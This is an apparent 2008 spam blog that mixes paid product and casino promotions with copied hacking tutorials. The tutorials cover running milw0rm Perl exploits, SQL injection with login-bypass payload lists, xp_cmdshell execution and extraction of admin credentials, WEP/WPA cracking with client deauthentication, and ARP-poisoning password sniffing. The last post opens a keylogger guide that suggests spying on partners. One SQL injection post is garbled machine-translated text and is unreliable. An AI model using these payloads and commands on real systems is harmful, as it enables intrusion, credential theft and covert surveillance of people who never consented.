Posted at Tuesday, October 21, 2008Before you start your business, you have to decide how much money you're going to need and you have to make sure that you have it available. You will need money to set up, start and run the business but you should also have the possibility to borrow some money should something unexpected happen or your business do extremely well. Borrowing money to invest in your business is a very common practice and should be seriously considered if you want to expand your business in a relatively short amount of time. If you need business loans now there is a funding company — which offers an easy process, fast funding and excellent service — EZUnsecured.Com. EZUnsecured.Com provides solution for your business financing. The experts behind this company will try their best to help business owner to survive and grow their business. Whenever you need an unsecured business loan, you can always go to EZUnsecured.Com.
Most Updated Online Casino Bonus Portal
Posted at Thursday, October 09, 2008Many no deposit online casinos that offer welcome free casino bonus without any deposit required usually ask you for ID or very rarely to register a credit card before they give you your free casino chips no deposit. But there is no point to worry about that, it is for the same purposes as when you have to show your ID when you are registering a players card at brick and mortar casino. No deposit online casinos just want to make sure you are legal age and that you collect the free bonus just once. After you verify your personal details you can get certain free online casino bonuses instantly or you have to provide no deposit casino coupon codes. After you enter the no deposit casino bonus codes you will receive the free casino bonus without having to make a deposit. Many online casinos offer you free casino money just if you sign up at their casino and register an account. These free casino chips at no deposit online casinos are called no deposit casino bonuses.
If you are looking for new USA online casino bonuses and promotions, special bonus codes and casino coupons there is a recommend site All-Casino-Bonuses.com. All-Casino-Bonuses is the most updated online casino bonus portal. All-Casino-Bonuses have listed top online casinos represent what is the cream of the crop of online gambling industry. These online casinos offer excellent gambling experience together with large generous promotions that determined to be the best deal online. All of these online casinos have flawless reputation, and the wagering requirements are generally not to pressing if you take into account the size of the bonus. All-Casino-Bonuses assist Americans who are looking for casinos accepting US players. All-Casino-Bonuses receive the information directly from the casinos themselves and update the information as soon as possible. If an Online Casino stops accepting US players it is immediately removed from the list. All-Casino-Bonuses also continuing, as always, on their search to find additional US online casinos who qualify to be listed as a recommended online casino accepting US deposits. So don't hesitate if you are looking for online casino accepting US player to visit the site www.all-casino-bonuses.com.
Play Slots, Roulette, Poker and Blackjack Online
Posted at Tuesday, September 16, 2008If you are want to play casino games online here at Dealem.com.au, it is a right place, they offering you an exciting, reliable and trustworthy service. Using advanced gaming software, Dealem.com.au able to bring you some of the best interactive gaming experiences available online. Playing at Dealem.com.au also allows you to take advantage of the fantastic offers they have available, which update constantly to ensure you are receiving the best promotions. Download for free and play some of your favorite online casino games like blackjack, roulette, and many more. You'll also enjoy playing Blackjack Casino, Online Poker and Online Slots. Specializing in Poker, Roulette, Slots and Blackjack, these lively casinos are the cyberspace version of a real live hotel and casino, and are a proud members of the highly esteemed Jackpot Factory Group. With high payouts, top rewards, and high betting limits, you can start playing the best online casino games in minutes.
Experience first-class online casino gambling with bonuses, promotions, and casino events. The fun and entertainment never ends here at Dealem.com.au. Challenge yourself to a wide variety of table games such Roulette, Blackjack Casino, Online Poker and Online Slots. They all offer a cheerful Welcome Bonus to all new players upon their first deposit. Plus, the casino's vast selection of over 265 amazing online casino games come side-by-side with frequent exciting promotions, where casino members stand to win even more bonuses and prizes. They offer you the winning combination of sporting fun and the thrilling chance to win. Offering their players a blast from the past but combining the perfect genuine Las Vegas gambling experience and the rocking 50s! Right from the onset, the casino management does everything possible to create a fun and unique feeling that simply cannot be beat. Should any of customers experience any problems, their support team are on hand 24/7 and you can call free or email from anywhere in the world. Join Dealem.com.au today and take advantage of special promotional offer.
Perl Tutorial Install and Runnning
Posted at Monday, September 15, 2008 Perl Tutorial Install and Runnning
Ok today I am going to show you how to use a perl exploit....
first go to
http://www.activestate.com/store/freedownload.aspx?
prdGuid=81fbce82-6bd5-49bc-a915-08d58c2648ca
And put in your info..... I might suggest not using your real name ><...
Select your download version (They do have a linux one)
Click, and download....Try to get the MSI file...Easier for installing...
on the msi just click next and what not...
Install and get ready for the next part....
Now to use an exploit, which we can get by going to milw0rm
milw0rm.com
now click on search....
if you can't find the link go to
milw0rm.com/search.php
and search perl....
now click on anyone of them....
I am going to be using
http://www.milw0rm.com/id.php?id=1489
Remember this is only for educational purposes....
I will post the code in another forum post
now open note pad and paste in the exploit....
and save it to you "perl/bin" folder...normally perl saves directly to your C Drive....
save it as
exploit.pl
and make sure to change where it "Text documents (*.txt)" to All files
MAKE SURE IT IS IN THE BIN FOLDER
now open command prompt...
and type
cd ..
then type
cd ..
now your Directory is in the c drive...
now type
cd perl\bin
and type
perl exploit.pl
and now you just follow the exploits directions and you now know how to use perl exploits...
SQL Injections Tutorial and Strings
Posted at Monday, September 15, 2008SQL Injections Tutorial and Strings
Details
1.0 Introduction
When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, we have to turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.
What is SQL Injection?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
What do you need?
Any web browser. Firfox runs very smoothly
What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "F0RM" tag in the HTML code. You may find something like this in some HTML codes:
code:<F0RM action=Search/search.asp method=post>[/quote]Everything between the <F0RM> and </F0RM> tags have potential parameters that might be useful (exploit wise).
<input type=hidden name=A value=C>
</F0RM>
What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:
****://duck/index.asp?id=10
How do you test if it is vulnerable?
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- ****://duck/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:
code:<F0RM action=http://duck/Search/search.asp method=post>[/quote]If luck is on your side, you will get login without any login name or password.
<input type=hidden name=A value="hi' or 1=1--">
</F0RM>
But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:
****://duck/index.asp?category=food
In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
SELECT * FROM product WHERE PCategory='food'
The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.
Now, assume that we change the URL into something like this:
****://duck/index.asp?category=food' or 1=1--
Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using double quote (") if single quote (') is not working.
The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:
#tcpdump icmp
If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.
How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
But the target IP must folder "share" sharing for Everyone.
6.0 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:
****://duck/index.asp?id=10
We will try to UNION the integer '10' with another string from the database:
****://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".
To get the next table name, we can use the following query:
****://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
We also can search for data using LIKE keyword:
****://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".
How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:
****://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
Now that we have the first column name, we can use NOT IN () to get the next column name:
****://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:
****://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.
Now, let's get the first login_name from the "admin_login" table:
****://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:
****://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5
We can now login as "neo" with his password "m4trix".
How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":
****://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.
To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:
****://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5
Now, you can even login as 'trinity' with the password '31173'.
How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":
****://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--
To INSERT a new record into the database:
****://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
We can now login as "neo2" with the password of "newpas5".
How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie
For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.
Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.
Delete stored procedures that you are not using like:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
Here are a list of strings that you can use on a simple web page.Put them in the password bar and admin in the user name bar and then press enter, if the first one doesn't work try the next one, if non of them work, then it won't work...
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Medical Assistant School Online
Posted at Wednesday, September 10, 2008Medical Assistant perform administrative and clinical tasks to keep the offices of physicians, podiatrists, chiropractors, and other health practitioners running smoothly. They should not be confused with physician assistants, who examine, diagnose, and treat patients under the direct supervision of a physician. Medical Assistant is different than physicians' assistants. The duties of Medical Assistants vary from office to office, depending on the location and size of the practice and the practitioneris specialty. In small practices, Medical Assistant usually is generalists, handling both administrative and clinical duties and reporting directly to an office manager, physician, or other health practitioner. Those in large practices tend to specialize in a particular area, under the supervision of department administrators.
If you are interesting about your career in Medical Assistant get started with Medical Assistant School Online at St. Augustine School of Medical Assistants. According to the United States Department of Labor, Medical Assistant employment is projected to grow much faster than average, ranking medical assisting among the fastest growing occupations over the next decade. Job opportunities should be excellent, particularly for those with formal Medical Assistant training. St. Augustine School of Medical Assistants now offering formal training online with nationally accredited and certified Medical Assistant program. Their program will allow you to study online at your own pace and convenience. Most students complete the program in about 6-8 weeks. However, you can take as long as needed. There are no deadlines or time limits and their Medical Assistant training program is very affordable. So, what are you waiting for? Register online today and become a Medical Assistant that very rewarding career.
Study Online to become a Nursing Assistant!
Posted at Friday, August 29, 2008If you are looking for a career in health care especially become a nursing assistant, you will find information at nursingassistant.us to help guide you in your career choice. For those of you who are not familiar with nursing assistants, they are known by many names such nurses aid, orderlies, patient care technicians, and home health aides, depending on where you live and work. Certified nursing assistants work under the supervision of a nurse and provide assistance to patients with daily living tasks. Working closely with patients, certified nursing assistants are responsible for basic care services such as bathing, grooming and feeding patients, assisting nurses with medical equipment, and checking patient vital signs. Certified nursing assistants give patients important social and emotional support and also provide vital information on patient conditions to nurses.
If you are interested in learning more about becoming a certified nursing assistant, please be sure to check out St. Augustine Educational Services Online through site nursingassistant.us that utilize the latest technology to offer a convenient, affordable and accredited nursing assistant program online. St. Augustine Nursing Assistant School provide certificate program on nursing assistance and medical assistance as well. Some benefits of nursing assistant program at St. Augustine Nursing Assistant School such online e-learning program allows students to study at their own pace and finish the program at their convenience. All classes are available 24 hours a day for students. Faculty and staff are always available online should you have any questions. Online Clinical Labs - Virtual Phlebotomy Lab, Virtual Injection Lab, online clinical instructional videos in medication injections, ultrasound and more!
Buy Online Kids Halloween Costume
Posted at Wednesday, August 27, 2008Did you know that there are many group kids Halloween costumes ideas? Many times, friends, relatives, and individuals that work together elect to dress in attire that is similar in theme on Halloween. In all actuality, that is the most important aspect to creating costumes that are appropriate for an entire group...having a similar theme. If your kids theme matches, then your kids group will be successful in their Halloween attire. Having group costumes can be a lot of fun. The most challenging aspect of the whole endeavor in Halloween costume ideas is choosing costumes that are similar in nature. It is often difficult to think of an idea that everyone will enjoy. However, once you have all agreed on an idea, this is a really fun activity that everyone will thoroughly enjoy.
If your kids grew up in the nineties, there are a number of group Halloween costume ideas that your kids may enjoy. First, your kids have the ever-popular Care Bears. There are many different bears to choose from. Surely each individual in your kids group can find one that truly matches their personality! This can be a lot of fun! Your kids may enjoy dressing like the Power Rangers, popular Disney movies from the decade, and more! If your kids are a Millennium type group, your kids may like dressing up like characters from Spongebob Squarepants, and even Hannah Montana. There are other popular group Halloween costume ideas as well. You may elect to have a Harry Potter theme. This is actually really popular. It is really easy to think about group ideas when it comes to costumes for Halloween. All it takes is a little bit of creativity and finding out what everyone else in the group likes, and you are sure to discover a group theme that everyone will agree on. If you are searching out group Halloween costume ideas, take these into consideration. Not only will your group be a big hit, but you are sure to have a lot of fun with them.
Rightnow, if you need Halloween costume for your kids group there is www.costumecauldron.com supplying you with all the information and resources you need to know about Halloween night. Struggling for kids Halloween costume ideas? Look no further. Take a look through Costume Cauldron vast collection of funny kids Halloween costumes as well as kids male and kids female Halloween costumes. The child halloween costume section is the biggest in Costume Cauldron online store and there is much to look through. Costume Cauldron have cute kids costumes for girls and boys that will make them the hit of the party. You’re never too young to celebrate your first Halloween. Pick out one of these adorable baby Halloween costumes to show your new baby’s the sights and sounds of his or her first Halloween. Just be sure to get your little goblin back in time for bed. There is also furry mascot costumes for your school sport games or a full size animals for the party. Don't miss out on Costume Cauldron blonde wig costumes for adult people. So, lets your kids get started their Halloween party!
SQL Injection the Complete Tutorial
Posted at Wednesday, August 13, 2008SQL Injection the Complete Tutorial
SQL injection is a technique that explores a vulnerability of security that occur in the database of a layer of application. The vulnerability i present when user input i either incorrectly filtered will go string literal escape characters embedded in SQL statements or user input i not strongly typed and thereby unexpectedly executed. The vulnerability is present when user is or incorrectly screened for literal cord escape built-in characters in the instructions SQL or users strongly are not typed and, like this, unexpectedly performed. It i in fact an instance of it lives general class of vulnerabilities that can occur whenever one programming or scripting language i embedded inside another. It is in fact an example of a form more general class of vulnerabilities that can occur whenever a programming language or scripting is inserted inside another.
__________________________________________________
Or Be an a lot Way NooB of invade a big quantity of sites. ...........
For that vc is going to be necessary. .....
*Google *internet Connected *Strings *codicos of Sql injection *JAP (is not necessario is good use barely as
security)
Then vamu her. ...............como I am baunzinho I see passes them half from the trabaio. ...
__________________
' to admin shell root First
vc goes in the google and digitizes the following one (allinurl: "Some Of The Strings") Without "Parenteses"
ah vc chooses a site noob applies in the login by example:' or' = 1 sign to same thing:' or' = 1
Promptly now vcs can vary the codicos and itself will want polpar work use some scanner of vulnerability as by example the acunetrix __________________________________________________
JAP 00.08.073
JAP — Anonymity & Privacy is a program that is going to guarantee to his privacy while sails for the internet. With that, you avoid that can monitor your accesses and guarantees the your anonymity by the net.
Code:
http://baixaki.ig.com.br/download/JAP.htm
__________________________________________________
Acunetix Web Vulnerability Scanner 5,0
Omprove itself his site is to the Test of hackers Acunetix Web Vulnerability Scanner is a powerful utility one that analyzes a site in search of possible vulnerabilities.
Code:
http://www.download3000.com/download_11974.html
Athletic Shoes for Men, Women, and Kids
Posted at Wednesday, August 13, 2008If you are looking for athletic shoes from many popular brand name, there is recommend name for you Shoebacca.com. At Shoebacca.com auction yesterdays and today's hottest footwear, offering savvy internet shoppers an opportunity to stretch their dollar further than ever. Shoebacca.com auctions brand name stock from floor models to disheveled items that are slightly dusty from warehouse storage. Shoebacca.com lists all brands, colors and sizes currently available. All shoes are standard manufacturer's sizes, widths and lengths unless otherwise noted in the auction. Shoebacca.com sells a variety of popular brand name athletic shoes for men, women, and kids. Shoebacca.com's website create a simple way for customers to select and purchase from various footwear brands. They offers customers the ability to easily view ever-expanding footwear offering.
Shoebacca.com where you always find the best athletic shoes at the lowest prices anywhere. Shoebacca.com carries your favorite brands in athletic footwear at the best prices. They provides most of popular brands such as Adidas, Converse, Fila, Hurley, K-Swiss, New Balance, Nike, PF Flyers, Pony, Puma, Vans, and more. At Shoebacca.com website you can selected the category (brand, style, size, color), then select your desired brand, click view selected brand you will see many available shoes. You may looking for some great prices on basketball, tennis, or any other type of athletic shoes, you might want to check out Adidas Shoes. This popular brand shoe which has a huge range of styles. With a few simple clicks, consumers can find shoes by brand including adidas, by style such as basketball shoes, and by specific sizes, widths and colors. Shoebacca.com offers discount shoes from many popular brand name athletic shoes. If you like to collect many cheap shoes you might to hunt for it from Shoebacca.com. ShoeBacca.com will serve you better than other shoe store. Start browsing for your shoes and find them at Shoebacca.com.
Advertisers Get Buzz with Snapbomb
Posted at Wednesday, August 13, 2008The trend of blog advertising has significantly grown over the last year as a new medium for companies to increase their media presence. However, the idea of bloggers being paid by companies to promote their product is relatively new. Part of the allure of blogs are their direct community input and feedback. Advertisers have just started to figure out how to inject their buzz without alienating the very target market they want to attract to their products. We think that buzz marketing or blog marketing done fairly is a valuable service to both consumer online and their customers. Buzz marketing, is highly valued by advertisers. Blog advertising can engage an important niche, enabling you to reach a critical market segment or to broaden the impact of your marketing spend. Regardless of your product, blogs can be an integral part of a marketing strategy.
Snapbomb offers advertisers generate buzz with blog marketing. Snapbomb is the fastest way to spread the word through the blogging community. They connects advertisers with bloggers willing to write honest reviews about their services and products. Benefits for advertisers include generate buzz, publicity and word-of-mouth marketing among thousands of blogs, announce your products, services, websites, and ideas to the world. The more bloggers talk about your site the better. Many blogs syndicate stories they see on other sites. Getting Reviewed by bloggers will provide advertisers with valuable feedback that advertisers can use to better understand advertisers's audience and customers.
WEP cracking in a nutshell (NEWCOMERS PLEASE READ)
Posted at Saturday, August 09, 2008WEP cracking in a nutshell (NEWCOMERS PLEASE READ)
It found that some of the commands differ from backtrack 2 to backtrack3 (slightly)
either way heres a step by step
once you have the backtrack iso cd in the tray and your network adapter plugged into the usb (it use a network adapter)
boot up your computer.
next to the k that resembles start menu in windows there should be a little black window click on it and it pulls up whats called terminal (simmilar to dos for windows)
now itll go into what to type in the terminals, it usually have about 4 of these windows open and it will identify which window you type in by writing "t1,t2, t3, etc" before each instruction
where it type <> you insert information where it type [enter] you hit enter
youll get it as we go along
also when you see your victims bssid you will want to copy it and then paste it where needed being that a bssid is pretty long. for those who hate using the mouse and use hotkeys the paste function is shift+insert for linux
t1:
type: airmon-ng stop ath0 (this will let you see the devices your using ex: rausb0) [enter]
ifconfig
macchanger --mac 00:11:22:33:44:55
airmon-ng start
t2: airodump-ng
airodump-ng -c
(let this window run throughout the entire crack)
basically what you just did in t2 was scan the available networks and then say to your computer ok well were gonna make a catch file in this location (this is where i said name a catch file) and were gonna read packets of information in this location (what your doing to crack the wep encryption is send information (packets) to whatever network you want to crack and that network is sending information back, the files we want are not neccessarily the packets but the arp's, thats what aircrack actually analyzes in order to crack the wep)
t3:
aireplay-ng -1 0 -a
aireplay-ng -3 -b
t4:
aircrack-ng -n 64 --bssid
for the catch file part...lets say it named my catch file "hack" it would type in hack-01.cap
and thats it you should have your wep passphrase
also a little something it noticed, though not true for all networks its true for many networks around my way....
it noticed the bssid is often the same as the passphrase, so just MAYBE you would want to try the bssid before doing the rest of the hack
WEP Crack Basics:
bt ~ # iwconfig (check wireless card name - we will assume ath0)
bt ~ # airmon-ng stop ath0
bt ~ # airmon-ng start ath0
bt ~ # airodump-ng -w capture -c 1 ath0 (writes to file "capture" on channel 1, as specified)
New terminal (leave other one open)
bt ~ # macchanger ath0 (not down MAC address)
bt ~ # aireplay-ng -1 0 -e NETWORK -a AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL ath0 (where the AA:BB:etc. is the access point's MAC address, also seen as the BSSID in the first terminal [airodump] window, and the second GG:HH:etc. is your own MAC address as seen in the macchanger window)
Section for when clients are attached to the network:
bt ~ # aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL ath0
Section for when no clients attached:
Method 1-
bt ~ # aireplay-ng -5 -b AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL ath0
Answer y for yes when prompted. Note down to two names of files - the fragment-xxx-xxxxxx.xor file, and the replay_src-xxx-xxxxxx.cap file)
bt ~ # packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w replay_src-xxxx-xxxxxx.cap
bt ~ # aireplay-ng -2 -r replay_src-xxxx-xxxxxx.cap ath0
Method 2-
bt ~ # aireplay-ng -4 -h GG:HH:II:JJ:KK:LL -b AA:BB:CC:DD:EE:FF ath0
Answer y for yes when prompted. Note down to two names of files - the fragment-xxx-xxxxxx.xor file, and the replay_src-xxx-xxxxxx.cap file)
bt ~ # packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h GG:HH:II:JJ:KK:LL -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w replay_src-xxxx-xxxxxx.cap
bt ~ # aireplay-ng -2 -r replay_src-xxxx-xxxxxx.cap ath0
Cracking the key:
bt ~ # aircrack-ng (-z) capture*.cap (the -z is in brackets because it can be used if you have captured ARP requests, and is faster - so try this first, but if it doens't work - remove it) (the capture*.cap is just using the file that you captured to - this can be run whilst capturing)
WPA Cracking:
bt ~ # airmon-ng stop ath0
bt ~ # airmon-ng start ath0
bt ~ # airodump-ng -w wpa -c 1 ath0
New Terminal:
bt ~ # aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c MM:NN:OO:PP:QQ:RR ath0 (where the MM:NN:etc. is a client's MAC address - this forces them to disconnect, giving us the "handshake" that we want, which contains the password, otherwise you just have to wait for a client to connect)
bt ~ # aircrack-ng -w dictionary.lst wpa*.cap (dictionary.lst is a dictionary/wordfile, as WPA has to be cracked with one of these. wpa*.cap is the capture file)
Sniffing for passwords
Posted at Saturday, August 09, 2008Sniffing for passwords
Download and install Cain and Abel (oxid.it). If you have nmap or wireshark installed you probably won’t have to install winpcap(which comes with the installation.)
http://www.oxid.it/cain.html
http://www.oxid.it/downloads/cain20.exe
Run the program.
Make sure the sniffer tab is selected at the top and the hosts tab is selected at the bottom. Make sure the sniffer is on it is the green circuit board button in the top left corner. Alternate click in the white space and click on scan mac addresses. This does an arp scan(different from an IP scan). It will show everyone on your network except for you.
http://www.flickr.com/photos/23172723@N08/2214744335/
Now switch to the arp poisoning tab. APR bottom tab next to hosts. Click the + icon on the top of the menu. This will give you a choice of Ip addresses to poison. The most interesting traffic is going to be between the default gateway(which you can find by typing ipconfig in the command prompt) and the other users on the network. Select the default gateway on the left and all the other users on the right. **Optional fun Now if computers are sharing files, to snag their passwords you need to select all the ip’s to all the ip’s you have to do this one ip at the time on the left. **
http://www.flickr.com/photos/23172723@N0...otostream/
If it is a large network you are going to want to monitor your resources on your computer to make sure you aren’t hitting 100% processor consumption or maxing out your ram. If this happens it will DDOS the network and people will start losing connections which is no good for password sniffing.
So now is the hard part….wait. Wait for people to log on to forums and myspace and all those great sites and wait for them to get in their vpns and telnets and such. One thing you can do while you wait is periodically check your internet connection to make sure you haven’t DDOSed the network. Ok so now time for the boon, click on the password tab at the bottom and see how many passwords you have racked up. If they are encrypted alt click on them and send them to the cracker built in to cain and abel.
**WOW THIS IS COOL TELL MORE ABOUT THE TCP/IP MAGIC**
On networks with a hub you don’t have to arp poison, but most modern networks are switched. So what is actually happening when you do this, is your computer answers every arp query as though it is the computer the packet is destined for. So your computer has all data from the network sent to it. I then routes(it doesn’t really route because that would be a layer three thing it would be more correct to say, it sends) the packets to the correct computer. So Cain has a bunch of prebuilt lists of stuff to look for, sometimes cain doesn’t catch all the passwords because of trixy web developers so if you have time you could run wireshark at the same time and manually comb through that data yourself. Etherflood is another program that will arp poison on a windows network.
a little bit about keyloggers
Posted at Saturday, August 09, 2008a little bit about keyloggers
the boring background
What keyloggers do is they take note of every keystroke that the person who downloaded the keylogger types. why is this useful? you can do a couple things with a keylogger. you can use it on yourself to find out everything that people type while your not around or you can install it on someone elses machine to see everything that they type.....
Uses
find out whats being typed on your computer while your not around
find out whats being typed on someone elses computer (example girlfriend or boyfriend)
passwords and log-ins
Why is this better than phishing?
although it is more difficult to keylog somebody than to phish them it is more effective because it gives you a constant feed as to what theyr typing. why is this useful? because if you phish someone you will only have the information they entered once on your phisher. with a keylogger you will have the password they use, and if they so happen to change that password you will know. and you can view what the type in EVERYTHING
anyways on to the better stuff
how to accomplish keylogging?
